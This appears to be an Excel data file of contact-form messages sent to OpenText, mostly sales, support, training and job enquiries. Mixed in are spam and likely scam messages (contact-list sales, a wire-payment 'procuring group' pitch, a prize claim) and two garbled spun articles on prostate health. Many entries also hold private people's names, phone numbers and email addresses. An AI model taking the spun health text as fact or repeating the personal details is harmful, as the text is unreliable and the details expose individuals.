    <t>Hello, I need to know who the RightFax Account Representative is or who the Technical Team member who can assist us. Our Server and Desktop teams have a few technical challenges with the current configuration and would like a few recommendations from the Technical team._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Anthony</t>
  </si>
  <si>
    <t>I would like to find out the dates for the face-to-face Host Intrusion Methodology and Investigation course in Pasadena.  Last I checked it was sometime in December but since the website changed I am not able to find it.  Please assist.  Thanks in advance.</t>
  </si>
  <si>
    <t>Interessado em atualização do Teleform</t>
  </si>
  <si>
    <t>Organizar los expedientes médicos de pacientes</t>
  </si>
  <si>
    <t>I want to buy iHub and we have BIRT report setup but we want more advanced features with birt. many of the birt report want to be reuse and can we use that ihub for advanced viewing. one of the customer interested in._x000D_
please let me know.</t>
  </si>
  <si>
    <t>that first order help me bro</t>
  </si>
  <si>
    <t>Gps map updates</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am searching for a job and I wanted to be a part of opentext,. Please let me know if any requirement is there._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Neetha</t>
  </si>
  <si>
    <t>In search of portal to get latest version of EnCase examiner. Seems to be missing, or moved from the most recent web location.</t>
  </si>
  <si>
    <t>Hi_x000D_
We would like to take this opportunity to introduce our company. We are Digicon Technologies Ltd., is a leading IT/ITES and business process outsourcing organization in Bangladesh. Through our dynamic solution mechanism, we list among our clients some of the world’s most prestigious firms and companies as well as diverse government agencies. Our company is a pioneer in paving the way for the rise of the BPO industry in Bangladesh and our experience gives us an edge in delivering an excellent customer experience. Our multinational team of experts and specialists allow us to offer a full spectrum of business process management services with a global outlook that sets us apart from the rest._x000D_
We believe that Bangladesh has a very good potential to bring electronic content/information management in financial services, manufacturing, and public services. It is in this respect that we would like to extend our interest in forming a partnership with your company to explore the potential market. We believe that our experience and recognition in the market can well compliment your solutions. At your request I can send you our company's introductory profile for your perusal. Should you be interested in this cooperation or have any questions in this regard, please feel free to give me a call at +8801678665028 or send me an email.Thank you very much, and we hope to receive your favorably response soon.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
I am in 4th year CSE at Vasavi College of Engg Hyderabad_x000D_
Opentext visits our campus every year for internship offers, but stilll didnt come this year,_x000D_
Please give me an internship opportunity at opentext hyderabad as a software developer in my next semester_x000D_
I have an awesome profile</t>
  </si>
  <si>
    <t>Hi Sir/Madam , I am in 4th year CSE at Vasavi College of Engineering_x000D_
I want to do internship in my next semester at opentext, Hyderabad._x000D_
Please give me an opportunity.</t>
  </si>
  <si>
    <t xml:space="preserve">Application for job </t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
 I went through your website and we would love to_x000D_
collabarte with your team on a project.           _x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
I am Jackson,_x000D_
 _x000D_
Would you prefer exploring new markets for your business using our newly updated Supply Chain Management Professionals? It will help in enhancing your sales as we provide you with verified direct contact details and mail ids._x000D_
_x000D_
Target Titles:_x000D_
_x000D_
•	Fleet Owners_x000D_
•	Risk/Cargo and Airline/Domestic Transportation Managers_x000D_
•	Shippers/Receivers/Vendors_x000D_
•	Contract Administrators_x000D_
•	Freight Brokers/Forwarders_x000D_
•	Customs/Charter Brokers_x000D_
•	Brokers/Carriers/Attorneys_x000D_
•	Postal/Logistics/Truck Operator_x000D_
•	Crane/ MHE Operator_x000D_
•	Inland Container Depot/CY/Dry Port Operator_x000D_
•	Rail-Freight Operator_x000D_
•	 Consolidators_x000D_
•	Systems Integrators_x000D_
•	Direct Marketers_x000D_
•	Import/Export Analysts and Supervisors_x000D_
•	Cargo and Airline/Supply Chain and Logistics Analysts_x000D_
•	Distribution Coordinators_x000D_
•	Express Operators _x000D_
•	Cargo Agents_x000D_
•	Customs House Agent_x000D_
•	General Sales Agents_x000D_
•	Others allied to this Industry_x000D_
 _x000D_
Segments:_x000D_
 _x000D_
•	Courier and Express Delivery Companies_x000D_
•	Logistics Companies_x000D_
•	Warehousing/Terminals_x000D_
•	Airline Junior Management_x000D_
•	Airline/Airport_x000D_
•	Manufacturer Reservations and Acceptance Staff_x000D_
•	Accounts/Sales/Operations People_x000D_
•	Air Freight Forwarder Sales and Many More_x000D_
_x000D_
If yes, then would you be interested in using our database which can help you in reaching Active List/Buyers List/Contacts List:_x000D_
_x000D_
List includes: Company and Contact name, Title/Designation, Direct contact number, Verified email address, Mailing address, Fax number, Revenue size &amp; employee size, SIC/NAICS and more._x000D_
_x000D_
List Details:_x000D_
_x000D_
	Format: Excel spreadsheet._x000D_
	Quality: We provide up to 90% and anything less than that we replace with fresh contacts._x000D_
	Benefits: Complete Ownership, Unlimited, Multichannel marketing._x000D_
_x000D_
Please reply with below details you would be looking to acquire at this time:_x000D_
 _x000D_
Target Industry: _____? Target Titles: _____? Geography: _____?_x000D_
_x000D_
I will get back to you with Data counts, Cost and Benefits._x000D_
 _x000D_
Thanks and Warm Regards,_x000D_
_x000D_
Jackson Ma</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are interested in converting our current telephone fax lines to the RightFax cloud service. The goal would be to leverage RightFax to securely deliver faxes to our file servers  in TIFF format to our  virtual printer queues. Please contact me so we may discuss the service offerings provided by RightFax. We have approximately 16 fax lines and the volume peak is about one thousand pages per month. We also need to have certification from the service provider to secure and protect data for HIPAA and other local compliance. _x000D_
_x000D_
Thanks,_x000D_
Nguyen Trieu</t>
  </si>
  <si>
    <t>Want to find out is there any fee if we use credit card to pay</t>
  </si>
  <si>
    <t xml:space="preserve">Need to get more information on EnCase Imager product suite, and more specifically a tool included in previous versions called "WinAcq" or any other feature set or tools that allows for a scripted / command line based image capture. I submitted 1 contact request in the past and got no response - please contact me so I can gather the information I need. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
At this time the City of North Vancouver Communications department is currently looking for a DAM solution, and are exploring our options. CNV is already a customer of OpenText, and use eDocs. So here are the most important aspects/questions we are looking for in a digital asset management system: _x000D_
•         For use of photos and videos of all file types (RAW files as well)_x000D_
•         Use on Windows and Mac Computers_x000D_
•         Not cloud-based, server-based in Canada as we are Canadian and need to be legally compliant_x000D_
•         We are a small communications department of six that need full user access, 3 of which that would have full admin privileges, but would like the ability to share with the city employees as a whole so diverse security permissions and sharing capabilities are important_x000D_
o   Do you provide an external portal for sharing?_x000D_
o   Does it report image usage history internally?_x000D_
•         Tagging capabilities extremely important_x000D_
•         Our current Photo Library contains 44,840 Files, 1,433 Folders (222 GB (238,927,070,580 bytes)_x000D_
•         Ability to capture and search on file metadata – ability to export metadata_x000D_
•         Ability to create own fields to properly profile rich media files_x000D_
•         Ability to create own galleries, collections, folders_x000D_
•         View images in various sizes including thumbnails_x000D_
•         Upload images in batches/ update in batches_x000D_
•         Does it have asset management tools such as:_x000D_
o   User-defined fields for retention_x000D_
•         Convert files to different formats (singular and on masse)_x000D_
•         What is the cost purchased, the cost for annual maintenance, other implementation costs?_x000D_
•         In total what is the cost for 1st year?_x000D_
_x000D_
If you could please respond by email that would be appreciated._x000D_
Thank you,_x000D_
_x000D_
Nicole D'Angelo</t>
  </si>
  <si>
    <t>We’re looking for a solution that will take our invoices in various forms (paper, pdf, edi) and upload the data into SAP where they can be posted automatically if everything matches for PO invoices or routed for approval for non-PO invoices or incorrect PO invoices. Also, the ability to have vendors go to a portal an upload invoice data.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know who your authorized resellers are in the US, please?  Thank You!  Could someone email me and let me know.  </t>
  </si>
  <si>
    <t xml:space="preserve">Stark County has approximately 250 physical fax machines that we would like to collapse into a fax server. We would like Engineering assistance prior to Contacting the VAR from the Manufacturer to Determine what Licensing and Plug-ins fit Best in our Environment   </t>
  </si>
  <si>
    <t>I have called your office and left 5 voice mails without any success. We currently have RightFax Express SUID 72160-12265 and we would like to upgrade it to RightFax. I been told that I need to talk to a sales representative to get this process started. Can someone give me a call at 925-260-0181</t>
  </si>
  <si>
    <t>Dear Supplier, I am the AP clerk that process your invoices for payment, and I need you to provide me copy of your last invoice.</t>
  </si>
  <si>
    <t>A group of us at CapitalOne would like to take the following courses:_x000D_
_x000D_
Designing Statements _x000D_
Designing Correspondence _x000D_
_x000D_
Can you please let us know when these courses will be available. We would like to do this out of the end of year budget._x000D_
_x000D_
Thank you,_x000D_
Ricardo</t>
  </si>
  <si>
    <t xml:space="preserve">We are a recently formed subsidiary of a European company selling cosmetics. We plan to partner with US retailers that strongly advice using your services for EDI and UPCs exchange. May I, please, request a meeting with sales representative who will be able to describe your services and find the one that fits our needs. I am stationed in Jersey City, so your NYC office location would be preferable. Thank you. </t>
  </si>
  <si>
    <t>We have just upgraded to M3 13.4, which provides support for XML documents in Streamserve.  We are running streamserve 5.6.2 and currently using streamprint flat files, and would like to transition to XML-based documents.  Do you have training classes available for this?</t>
  </si>
  <si>
    <t>I have a lead in Argentina for eDocs</t>
  </si>
  <si>
    <t>Complaint about the customer service for a renewal for what used to be Guidance software's EnCase.  We have tried to find a way to purchase an academic license for the year as we have done in the past for many years and a week has gone in the semester and still no resolution.  I have left 5 messages on the support line and then finally created a ticket (3950716).  I even provided our old dongle ID but have not heard anything._x000D_
The last word I received was an email stating that Bhageerath deals with product licensing and would move this email to the correct location._x000D_
That is what we need is a product license and pay for it as we have done in the past._x000D_
Please expedite this matter because we are already one week into the semester without any software._x000D_
  You can contact me by phone at 512-789-4731. I am an instructor with Austin Community College.  Mary Kohls is the department chair that has had to purchase the license for my class.  Her email is kohls@austincc.edu._x000D_
_x000D_
_x000D_
Philip Cupina</t>
  </si>
  <si>
    <t>Good afternoon!_x000D_
_x000D_
My name is Alexander Frost and I used to work for OpenText UK from February 2011 till July 2013._x000D_
_x000D_
I was wondering whether it is possible for me to obtain a reference letter from OpenText - ideally including the dates, title, brief description of responsibilities, and salary. Preferably as a signed letter on paper, but a signed PDF file would be acceptable as well._x000D_
_x000D_
This can be sent to my address as on your records (as I still live there), or alternatively my email (if this is a PDF)._x000D_
_x000D_
I know this is a general enquiry form, but I cannot find HR contact on your website...</t>
  </si>
  <si>
    <t>Soulmate</t>
  </si>
  <si>
    <t>Need IRM client that works with non vulnerable version of adobe acrobat (DC 2018)</t>
  </si>
  <si>
    <t>V192046368_x000D_
_x000D_
I am a new support person on the Harris team. I need access to support and FAQ page.</t>
  </si>
  <si>
    <t xml:space="preserve">I updated to Encase 8.07, however, upon starting the program is says No V7 Cert. Although I placed the certs form my previous installation in the cert folder. </t>
  </si>
  <si>
    <t>We are using SQLBase version 9.  It was provided by our ERP provider.  I'm interested in updating the DBMS.  I've contacted them.  Could I get the upgrade directly from you?  What are the hardware and OS requirements for version 11 and 12?</t>
  </si>
  <si>
    <t>I would Like to know if iphone 6 would work with Application Xtender?</t>
  </si>
  <si>
    <t xml:space="preserve">I support the Microsoft SCCM product for Application Installations.  We are upgrading from 8.2 to 8.3 with anticipation of installing 9.x soon.  I would like to get access to the support area, so that I can get information on how to do Silent Installs via SCCM?  Thanks much,_x000D_
_x000D_
Ben </t>
  </si>
  <si>
    <t>Hello. I work in payment services for the University of Guelph in Ontario, Canada. We recently received a letter stating that Guidance Software Inc is now OpenText and that you have a new remittance address and banking details. I would just like to confirm that the banking details are in fact true and correct so that we can make the change. _x000D_
_x000D_
I look forward to someone reaching out to me. _x000D_
_x000D_
Thanks, _x000D_
Ryan Belcastro</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
gibt es eine Einstellmöglichkeit das Dokumente mit dem gleichen Barcode in einer Datei zusammengefasst werden und als ein Dokument abgelegt werden?</t>
  </si>
  <si>
    <t>The prostate gland is an essential section of a male's the reproductive system. It secretes fluids that assist the transportation and activation of sperm. The prostate gland is situated just while watching rectum, below the bladder and surrounding the urethra. When there is prostate problem, it is almost always really miserable and inconvenient for that patient as his urinary system is directly affected. _x000D_
 _x000D_
The common prostate health problems are prostate infection, enlarged prostate and prostate cancer. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, often known as prostatitis, is the most common prostate-related symptom in men younger than 55 years old. Infections of the prostate gland are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis is the least common coming from all forms of prostate infection. It is brought on by bacteria based in the large intestines or urinary tract. Patients may experience fever, chills, body aches, back pains and urination problems. This condition is treated by making use of antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to relieve the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is often a condition of the particular defect in the gland and also the persistence presence of bacteria within the urinary tract. It can be caused by trauma towards the urinary tract or by infections received from the rest of the body. A patient may go through testicular pain, back pains and urination problems. Although it is uncommon, it can be treated by removal from the prostate defect as well as making use antibiotics and NSAIDs to take care of the soreness. _x000D_
 _x000D_
Non-bacterial prostatitis makes up about approximately 90% coming from all prostatitis cases; however, researchers have not yet to establish the sources of these conditions. Some researchers think that chronic non-bacterial prostatitis occur as a result of unknown infectious age</t>
  </si>
  <si>
    <t>The men's prostate is central to the portion of a male's reproductive system. It secretes fluids that help the transportation and activation of sperm. The men's prostate is found just in front of the rectum, below the bladder and around the urethra. When there is prostate problem, in most cases really miserable and inconvenient for the patient as his urinary system is directly affected. _x000D_
 _x000D_
The common prostate medical problems are prostate infection, enlarged prostate and prostate cancer. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, often known as prostatitis, is among the most common prostate-related symptom in men younger than 55 years of age. Infections in the prostate related are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis is the least common of types of prostate infection. It is due to bacteria perfectly located at the large intestines or urinary tract. Patients may experience fever, chills, body aches, back pains and urination problems. This condition is treated through the use of antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to relieve the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is a condition of the particular defect inside the gland and also the persistence presence of bacteria inside urinary tract. It can be a result of trauma on the urinary tract or by infections via other parts from the body. A patient may feel testicular pain, spine pains and urination problems. Although it is uncommon, it is usually treated by removal from the prostate defect as well as making use antibiotics and NSAIDs to treat the redness. _x000D_
 _x000D_
Non-bacterial prostatitis makes up about approximately 90% of prostatitis cases; however, researchers have not to determine the cause of these conditions. Some researchers believe that chronic non-bacterial prostatitis occur due to unknown infectious agents while other believe intensive exercise and heavy lifting</t>
  </si>
  <si>
    <t>We have TD1.1 (Centura 2.1) code. What does it cost to inject our legacy code into the current version of TD? Copy/Paste? Review line per line? Rewrite from scratch? Please no phone call without prior email to agree on a date/time. Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">I am considering OpenText NFS client for my solution hosted on Windows servers on AWS. What I am not clear about is whether this product supports Windows 2012 server? Can you please confirm. Thanks </t>
  </si>
  <si>
    <t>Attempting to confirm support agreement as main Actuate user has left Capita</t>
  </si>
  <si>
    <t>I have signed up fro your $174 CAD package.  Do I download over the internet, or do you post me a discs?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
We have made a request for Exceed Licenses 1 - 200 users for one of our clients, and we still have not heard back from you. Can you please send us a quote. We are a reseller based in France. Our client is Sogeti France. Please, this is very urgent. Thank you. Kind Regards </t>
  </si>
  <si>
    <t>Trying to reach out to your Finance Department regarding an unpaid invoice</t>
  </si>
  <si>
    <t>Hvac maintanance business proposal</t>
  </si>
  <si>
    <t>I'm interested to find out more about the Case360 functionality; are you able to e-mail through some details?</t>
  </si>
  <si>
    <t>We need to get access to Gupta Team Developer (preferably 2006 edition) to assist a client with scoping some upcoming work. The trial version download link is broken.</t>
  </si>
  <si>
    <t>I'm inquiring on any training that may be available or best practices on maintaining EnCase Endpoint Investigator. Currently our SOC performs investigations but I would like to know if their is any training available on management/maintaining the system and any in depth knowledge on the functionality of the product itself.</t>
  </si>
  <si>
    <t>Feedback my item</t>
  </si>
  <si>
    <t>Configuration of smtp routing to o365 email address. We just migrate from exchange to o365. Our rightfax version is 10.x</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiring into availability for October 9, 2018, EnCase Training, DF120 in Norwood, Massachusetts.  </t>
  </si>
  <si>
    <t xml:space="preserve">Greetings, is there any update on the delay we are currently seeing? I placed an order for Encase software and Tableau hardware a week ago and no one seems to know when it will process and ship._x000D_
V/r_x000D_
Tom _x000D_
 </t>
  </si>
  <si>
    <t>Can Open Text SSH be added to current Open Text licenses?</t>
  </si>
  <si>
    <t>We recently download 8.07, but all of our dongles are saying "sms is expired". I am requesting our license files to bring EnCase back online. I believe we have 5 licenses, but I am unable to login to my account to check, despite confirming my email multiple times. - Nate</t>
  </si>
  <si>
    <t>The following email address is being used for phishing purposes that are targeting our client, Investment Corporaion of Dubai (ICD). It was also reported that the majority of ICD investors are their favorite target._x000D_
_x000D_
Please shutdown/suspend this as soon as possible, as we are aiming to mitigate further damage upon our client's image and operations._x000D_
_x000D_
The following email address is fraudulent and is being used for phishing attacks._x000D_
 _x000D_
_x000D_
Phishing Email Address: maktoumm.icd-uae@financier.com_x000D_
_x000D_
Type : Email Phishing_x000D_
 _x000D_
_x000D_
This is causing causing our client a financial impact so we appreciate you treating this incident with urgency._x000D_
_x000D_
We are looking forward to your immediate response with this site take down._x000D_
_x000D_
Please let us know if you have any queries.</t>
  </si>
  <si>
    <t>PO #SSD6641 was submitted by CDW on behalf of Bosch for TX1 Forensic Imager Kits x 4. This order was listed for delivery on August 13th, but the order has not been received and we have received no updates or tracking information at this point. We have followed up multiple times with representatives from OpenText and have not received a clear answer regarding the status of the order. This is a $15,000 order that is now coming up on three weeks past the schedule delivery date and we still have not received any information about the order. This needs to be resolved immediately. We are continuing to escalate this and will do so until a resolution is reached. I would also like to speak with the director of sales for OpenText to understand why there is such a significant delay and why we have been stonewalled and received no information about this order.</t>
  </si>
  <si>
    <t>Request quote for Government proposal. Please provide contact email to send RFQ to.</t>
  </si>
  <si>
    <t>Employment Query: Order Administration Specialist (Cork) _x000D_
_x000D_
To whom it may concern, _x000D_
_x000D_
I am contacting you in relation to the above position as advertised on your website. Is it possible to still apply? _x000D_
_x000D_
With thanks and regards, _x000D_
_x000D_
James Buckley _x000D_
_x000D_
E: jamesbuckley06@gmail.com _x000D_
P: 085-1221976</t>
  </si>
  <si>
    <t>My name is Kee with Employment Screening Services and we need to verify past employment for Edward Osoro. We just require the employee's dates of employment and position with the company. Can someone assist us with this request? Thank you so much!</t>
  </si>
  <si>
    <t>_x000D_
Good day to you There!_x000D_
_x000D_
Haven gone through your company's website accordingly, we want you to know that our client here in Dubai U.A.E who had placed an inquiry on order from your store with us as a procuring company._x000D_
_x000D_
Kindly reply us if you can ship to United Arab Emirates(UAE). We could also provide a USA delivery address incase you would not be able to get the appropriate shipping arrangements into the UAE so we can email the order needed from your store with quantity and also let us know if you accept payment by wire transfer_x000D_
_x000D_
REPLY TO EMAIL: ahsanmohammed0118@gmail.com _x000D_
_x000D_
Will be glad to read from you soon_x000D_
Al Musaab Procuring Group LLC_x000D_
Ahsan Mohammed_x000D_
Al Moosa Tower 1, floor 20, _x000D_
Dubai_x000D_
United Arab Emirates</t>
  </si>
  <si>
    <t xml:space="preserve">I'm already familiar with your ETX software for enabling high-performance remote Linux sessions, so I don't need any of your slideware/ebooks._x000D_
_x000D_
What is your license model? Do you charge per user? If so, what is the license cost per user? We would need to license the server and client ETX software. On the server side, we'd be running CentOS 7. On the client side, it's a mix of Windows 10 and Mac OS. _x000D_
_x000D_
Thanks,_x000D_
Joseph_x000D_
</t>
  </si>
  <si>
    <t>Maneger</t>
  </si>
  <si>
    <t>Vaccencies for Freshers</t>
  </si>
  <si>
    <t xml:space="preserve">I'm at the beginning stages of looking for a new faxing solution so users can send and receive faxes from their desktops. </t>
  </si>
  <si>
    <t>Will the TX1 provide support for APFS? Currently the documentation only lists: Extensive filesystem support - ExFAT, NTFS, EXT4, FAT32, and HFS+.</t>
  </si>
  <si>
    <t>How can I obtain warranty information for S-CPFG2100D1R and also its lifecycle information?</t>
  </si>
  <si>
    <t>I'm trying to find a manual to download for Documentum 6.0.  Specifically, I need to know what encryption algorithms are supported by this legacy version of Documentum.</t>
  </si>
  <si>
    <t>Good day to you There!_x000D_
_x000D_
Haven gone through your company's website accordingly, we want you to know that our client here in Dubai U.A.E who had placed an inquiry on order from your store with us as a procuring company._x000D_
_x000D_
Kindly reply us if you can ship to United Arab Emirates(UAE). We could also provide a USA delivery address incase you would not be able to get the appropriate shipping arrangements into the UAE so we can email the order needed from your store with quantity and also let us know if you accept payment by wire transfer_x000D_
_x000D_
REPLY TO EMAIL: ahsanmohammed0118@gmail.com _x000D_
_x000D_
Will be glad to read from you soon_x000D_
Al Musaab Procuring Group LLC_x000D_
Ahsan Mohammed_x000D_
Al Moosa Tower 1, floor 20, _x000D_
Dubai_x000D_
United Arab Emirates</t>
  </si>
  <si>
    <t>We are transitioning our document management provider. I used Documentum when I was at Wells Fargo and would like to evaluate it as a potential alternative for our business. We are a firm of ~30 employees and would like to return to a simple, "windows explorer"-type document management solution with some added features (we are currently browser-based and it is a huge pain point in our organization).</t>
  </si>
  <si>
    <t>We want to implement Open Text solution for DMS(SAP and Non SAP Docs). Please let me know prerequisite and requirement from our side._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Need information about private training classed, as published on the Training page of your web site.</t>
  </si>
  <si>
    <t>Hi, we are using QuickScan 4.7 SP1 from 3 years but now its asking for the serial number. please do the needful.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
Hope you are doing great._x000D_
I am a part of a large global software reseller, SoftwareONE. We have an end user Optum Global Solutions (Philippines),Inc. want to procure below mentioned license for their environment in Phillipines. They have reached out to SoftwareONE Phillipines to see if we were able to procure this software for them. _x000D_
 We request you to please provide the below details for this request:_x000D_
Sku No.	Item Description	Qty	List Price_x000D_
(per user)	Currency	Is it Perpetual / Subscription based License ?	Operating System	Version	Reseller Discount_x000D_
(in %)	Customer Discount_x000D_
(if applicable)_x000D_
 	xPression xDesign 4.6.1	1	 	 	 	 	 	 	 _x000D_
	xPresso for Adobe InDesign 4.6.1	1							_x000D_
									_x000D_
 Bill-to-SWO Location: SoftwareONE Phillipines_x000D_
Deploy-to-Customer Location: Phillipines_x000D_
Kindly mention your terms and conditions_x000D_
Quote Validity ( to which date the prices are valid)	 _x000D_
Payment Terms (e.g Net 30, Net 40 etc)	 _x000D_
Mode of Payment (e.g Credit Card, Bank Wire etc)	 _x000D_
Delivery Time	 _x000D_
Are the Prices Valid Globally ?	 _x000D_
Process of placing order	 _x000D_
Taxes	 _x000D_
EULA link	 _x000D_
Company Address 	 _x000D_
Thank you for your time and attention and I look forward to your prompt response on this matter._x000D_
 If I can be of further assistance, please feel free to contact me._x000D_
Best Regards,_x000D_
 	  _x000D_
  Saptarshi Ghanty | Procurement Specialist | SoftwareONE_x000D_
  saptarshi.ghanty@softwareone.com|www.softwareone.com _x000D_
  Phone no : +91 1243044518_x000D_
  Check out: Why SoftwareONE? | PyraCloud | Customer Transformation   _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are looking at a tool allow us to online reviewing drawings/pdfs/words, and is the brava tool what we are looking for? how can we purchase that?</t>
  </si>
  <si>
    <t>Good morning, one of our customers is interested in your solutions, I would like to understand if it is possible to manage directly with you or if you need to contact one of your Italian partners present in your site. Thank you and I await your reply</t>
  </si>
  <si>
    <t>Hi, We(Optum India) are looking for the pricing model for the BIRT I-Hub server on commercial edition. Could you help us with the details. _x000D_
We are currently doing some POC with the trail edition available from the site. Would like to know the cost model to continue our exploration on the tool._x000D_
_x000D_
_x000D_
Thanks,_x000D_
Harish</t>
  </si>
  <si>
    <t>I am currently doing a quick evaluation of E-Discovery tools for GDPR for tomorrow and would appreciate answers to the following questions:_x000D_
How are costs calculated? Is it Licensed or storage based?_x000D_
Could you give me example costs for a small company and a large corporation?_x000D_
How quick can your solution be deployed?_x000D_
Are your products in use for GDPR and if so do you have clients in the UK?_x000D_
Regards_x000D_
Martin</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
 I am trying to contact some of our Russian colleagues as I may have a sales opportunity for them. Could someone please reach out to me for further detail?_x000D_
_x000D_
Thanks, _x000D_
Chris</t>
  </si>
  <si>
    <t xml:space="preserve">How to reach support web pages for guidancesoftware products ? looks like direct links does notr work and from guidance page it redirects to yopur support. I need to open ticket for out educationa lincece </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I need Pricing for Exchange Archivsysteme _x000D_
•	Jetzt mit 100 Usern im PoC starten_x000D_
•	Mit 300 Usern bis Ende des Jahres arbeiten_x000D_
•	Mit 500 Usern bis Ende Q1 arbeiten_x000D_
•	1000 User bis Mitte des Jahres erreichen_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Preisfindung</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
                _x000D_
HireRight has been appointed to verify information for the purposes of a pre-employment screening report and have been asked to confirm the employment history of your previous employee._x000D_
 _x000D_
We would like to inquire for direct phone number or email address for Opentext Human Resources/Payroll Department where we can send the request form for reference. I would appreciate if you could send me the information as soon as possible._x000D_
 _x000D_
Thank you in advance for your assistance and I look forward to hearing from you soon._x000D_
 _x000D_
Ashley,</t>
  </si>
  <si>
    <t xml:space="preserve">To the representative,_x000D_
_x000D_
On behalf of DBM Consultants, I’m gathering information about AI / machine-based text analytical tools that we may potentially transition from manual-based verbatim coding. We are strongly interested in the insights and cost saving attributes that switching to AI could potentially deliver. As a market research firm, we have existing clients and codeframes that we would like to adapt to if possible. However we are also open to the idea of innovating the way we present insights from verbatims. We understand the ability to analyse sentiment and keywords, but we are most interested in the ability to code or quantify this data in a structured manner (i.e. codeframe) to produce trend analysis over time._x000D_
_x000D_
I would be happy to further our communication about the possibilities available, however we would like to take a couple of things into consideration_x000D_
_x000D_
-	The ability of having a free trial of the analytical tools based on in-house data sets_x000D_
-	The ability of the analytical tool to ‘code’ the data based on existing codeframes_x000D_
-	The ability of the analytical tool to ‘code’ the data based on Key Drivers (i.e. Product, Process, People…etc.)_x000D_
-	The ability to integrate with existing in-house platforms (i.e. Tableau, Survey Reporter, SPSS…etc.)_x000D_
-	Could you please provide any costing structure model available._x000D_
_x000D_
We are interested to see what your tools can deliver for us and I am looking forward to hearing from you soon._x000D_
_x000D_
Cheers,_x000D_
Chris._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are construction co. in Saudi arabia. I have some queries._x000D_
1.	Is it cloud base web application?_x000D_
2.	How much does cost?_x000D_
3.	Its internal only or external also to communicate with client?_x000D_
4.	how about the training?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in obtaining our Insurance Agents &amp; Brokers? Our database was last updated on June 2018 with email addresses across USA, UK, Canada, Australia, New Zealand and rest of other countries._x000D_
_x000D_
Our Data fields: First Name, Last Name, Job Title/Specialty, Company Name, Address, City, State/Province, ZIP/Postal Code, Country, Phone, Web Address and Email Address._x000D_
_x000D_
Additional List:  Mortgage and Loan Brokers, Real Estate Agents, CEO, CFO, IT Senior Titles, Sales Directors, HR Senior Titles email list, B2B, etc…_x000D_
_x000D_
Great to chat further with you, let me know your interest._x000D_
_x000D_
_x000D_
_x000D_
Thanks &amp; Regards,                                                                                  _x000D_
Tom Green_x000D_
Business Development Executive_x000D_
AccurateInfoLeads/Updated Contacts _x000D_
If you do not wish to receive further communication, please reply as Leave out_x000D_
</t>
  </si>
  <si>
    <t>Hi Team, I am presales consultant and working for one RFP for Dubai customer . And looking for the RightFax solution to move from onprem setup to cloud based solution possibility. As customer is running on the version 9.4 and need to upgrade. Please contact me as earliest. I am operating from India and my contact number is +918448982031</t>
  </si>
  <si>
    <t>partnership</t>
  </si>
  <si>
    <t>I'm interested to know your product.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am from a company called Xcellerate IT.  We are currently using the windows version of edocs.  We would like to know if there is a browser based version of edocs that we can  use and are there any dependencies on MS office products that we need  to be aware of?_x000D_
_x000D_
Looking forward to your reply._x000D_
_x000D_
Regards,_x000D_
_x000D_
Romeo_x000D_
</t>
  </si>
  <si>
    <t>I am looking for Open Text training re document presentment.</t>
  </si>
  <si>
    <t xml:space="preserve">I signed into my Hightail Account and it says Hightail is now OpenText but did not go beyond that. Did not take me to OpenText, so I went to that website and signed in but it does not recognize me. I need to send files. What I am suppose to do? Please advise. Aloha, Peggy_x000D_
</t>
  </si>
  <si>
    <t>This site is saying I have won the prize money and I would like to have the prize money mailed to Utah place Apt A Greensboro NC 27405</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to speak to an OpenText Content Suite Platform representative to learn more about the capabilities of the solution and potentially conduct a brief product demo.</t>
  </si>
  <si>
    <t>we have an old version of Brava Desktop.  We are upgrading to Windows 10 and need to know what version of OpenText Brava is supported under win10</t>
  </si>
  <si>
    <t>I cannot reset my password and no reason is given for what is incorrect.</t>
  </si>
  <si>
    <t>We are a b2b credit card processor looking for an electronic billing presentment solution for our customers rather than developing our own proprietary product.</t>
  </si>
  <si>
    <t xml:space="preserve">Intermediate training course. </t>
  </si>
  <si>
    <t>Gostaria de saber se vocês possuem alguma solução para gestão do ciclo de vida de políticas e normas de uma organização, com workflow de elaboração, revisão, aprovação e publicação; definição de usuários/perfis responsáveis pela manutenção e atualização, etc.</t>
  </si>
  <si>
    <t>Want to setup 3 fax to email lines for our office.</t>
  </si>
  <si>
    <t>Discuss upgrading AppXtender from 6.5 to 8.1.  Also would like to know about consulting and training opportunities.</t>
  </si>
  <si>
    <t>I would like to know if you have a local partner here in Chile to review the solutions you offer and to lead the implementation project. Local support is importan to us. Thanks.</t>
  </si>
  <si>
